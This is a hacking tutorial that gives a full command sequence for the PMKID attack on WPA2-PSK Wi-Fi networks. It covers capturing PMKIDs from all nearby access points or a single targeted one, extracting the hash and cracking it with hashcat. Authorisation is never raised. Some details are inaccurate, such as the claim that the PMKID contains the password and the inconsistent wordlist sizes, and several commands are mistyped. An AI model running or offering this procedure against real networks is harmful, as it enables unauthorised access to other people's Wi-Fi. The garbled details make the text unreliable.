Wi-Fi Hacking, Part 11: The PMKID Attack

Cybersecurity Cyberwarrior Hacking InfoSec

Welcome back, my aspiring cyber warriors!

As you know, the key to hacking the WPA2-PSK is to capture the PSK (pre-shared key or password) as it passes through the air in the 4-way handshake between the client and the AP (you must be in monitor mode to do so). This requires that we either wait for a client to connect to the AP or if a client has already connected, then we bump the client off (de-authenticate) the AP and wait for them to re-connect.

What if we could skip that step to get the password hash directly from the AP. That is exactly what the PMKID attack is!

This new technique (August 2018) was developed by the security researchers at hashcat, the fast Linux-based password cracking tool. They were conducting research on Wi-Fi hacking with the tools included in hcxtools repository and when they found something interesting. They found that they could pull information directly from the AP that included the PSK without a client connecting to the AP!

Let’s see how this tool works and use it on some AP’s.

Step #1: Download and Install hcxdumptool

The tools we need for this hack are not built into Kali but we can get them from github.com

First, we need to download hcxtools.

kali > git clone https://github.com/ZerBea/hcxtools.git

Next, download hcxdumptools.

kali > git clone https://github.com/ZerBea/hcxdumptool.git

Once it has downloaded, we then need to make and install each of these tools.

Navigate to the new hcxdumptool directory.

kali > cd hcxdumptool

Then run make and make install

kali > make

kali > make install

Then navigate to the hcxtools directory and do the same.

kali > cd hcxtools

kali > make

kali > make install

Step #2: Place your wireless adapter into monitor mode with airmon-ng

Next, we need to start airmon-ng from the aircrack-ng suite of Wi-Fi hacking tools to put our wireless adapter into monitor mode.

kali > airmon-ng start wlan0

Note that when airmon-ng starts it will rename your wireless card from wlan0 to wlan0mon.

Now, start airodump-ng on the wireless adapter in monitor mode.

kali > airodump-ng wlan0mon

Step #3: Use hcxdumptool to Capture the PMKID

The next step is to use the hcxdumptool to go out to the Wi-Fi AP’s and grab the PMKID that contains the PSK (pre-shared key or password).

kali > hcxdumptool -i wlan0mon -o Hackers-ArisePMKID –enable_status=1

Where:

-i indicates the Wi-Fi adapter (wlan0mon in this case)

-o is for output. This is a file you designate to write the PMKID to

–enable_status=1

Now, run the command and be patient. In some cases, it may take hours to grab all the PMKID’s. As you can see in the screenshot above, hcxdumptool is grabbing and enumerating each PMKID for each AP in the area.

Step #4: Capturing a Single PMKID

In most cases, you probably will not want to grab all the PMKID’s in the area, but rather target one specifically. We can do this by adding a filter for the BSSID of the target AP.

To do so, you will need to create a text file with the only the BSSID of the target AP without any colons or commas. You can do his using the cat command such as;

kali > cat > target BSSID

>aabbccddeeff

Use CTRL+D to exit cat. Make certain that the second line contains the target BSSID and nothing else.

This now creates a simple text file of the target BSSID that hcxdumptool can read.

Now, to use this filter for a single AP, we simply append a few options onto our previous command. Most importantly, we add

–filterlist_ap=targetBSSID

–filtermode=2

These two options tell hcxdumptool to use the AP BSSID as a filter and only capture the PMKID from that single AP.

kali > kali > hcxdumptool -i wlan0mon -o Hackers-ArisePMKID

–enable_status=1 –filterlist_ap=targetBSSID –filtermode=2

Note that after awhile (in some cases, hours), hcxdumptoool was able to capture the PMKID of the single target AP and place it into our file “HackersArisePMKID”!

Step #5: Strip Out All the Extraneous Data in the PMKID

The PMKID contains the hash of the PSK, but also a lot of other information we don’t need or want. We need to strip out that data leaving us just the hash of the PSK before we can start cracking the hash. To do this, we need to hcxcaptool that is part of the group of tools we downloaded earlier as part of the hcxtools.

Navigate to the hcxtool directory.

kali > cd hcxtools

Now, we use hcxcaptool to strip out all the other information in that file leaving us with just the PSK hash.

kali > hcxcaptool -z hashoutput.txt HackersArisePMKID

This will now leave us with the PSK hash in the file we designated here after the -z option, hashoutput.txt

Step #6: Crack the Hash!

Our final step is to crack the hash. We can do that with any of the password cracking tools in our arsenal including john, hashcat and many others. Here, I’ll use hashcat to crack it using the top 10,000 passwords as my wordlist.

kali > hashcat -m 16800 hashoutput.txt top100000password.txt

Where:

hashcat is the password hash cracking tool

-m 16800 designates the type of hash

hashoutput.txt is the file containing the stripped out PSK hash

top100000passwords.txt is a plain text file containing the 10,000 most common passwords

Summary

The new PMKID attack (August 2018) provides us with one more method of attacking the WPA2-PSK enabled Wi-Fi AP’s. The beauty of this attack is that doesn’t require us to wait for a client to connect and associate or deauthenticate a client. In my tests, 80-90% of wireless AP’s with respond with the PMKID when probed with the hcxdumptool.

For more on Wi-Fi hacking, see my Wi-Fi hacking series here or purchase the Wi-Fi hacking videos in our online store. To learn more Wi-Fi Hacking and other hacking techniques join our Subscriber program.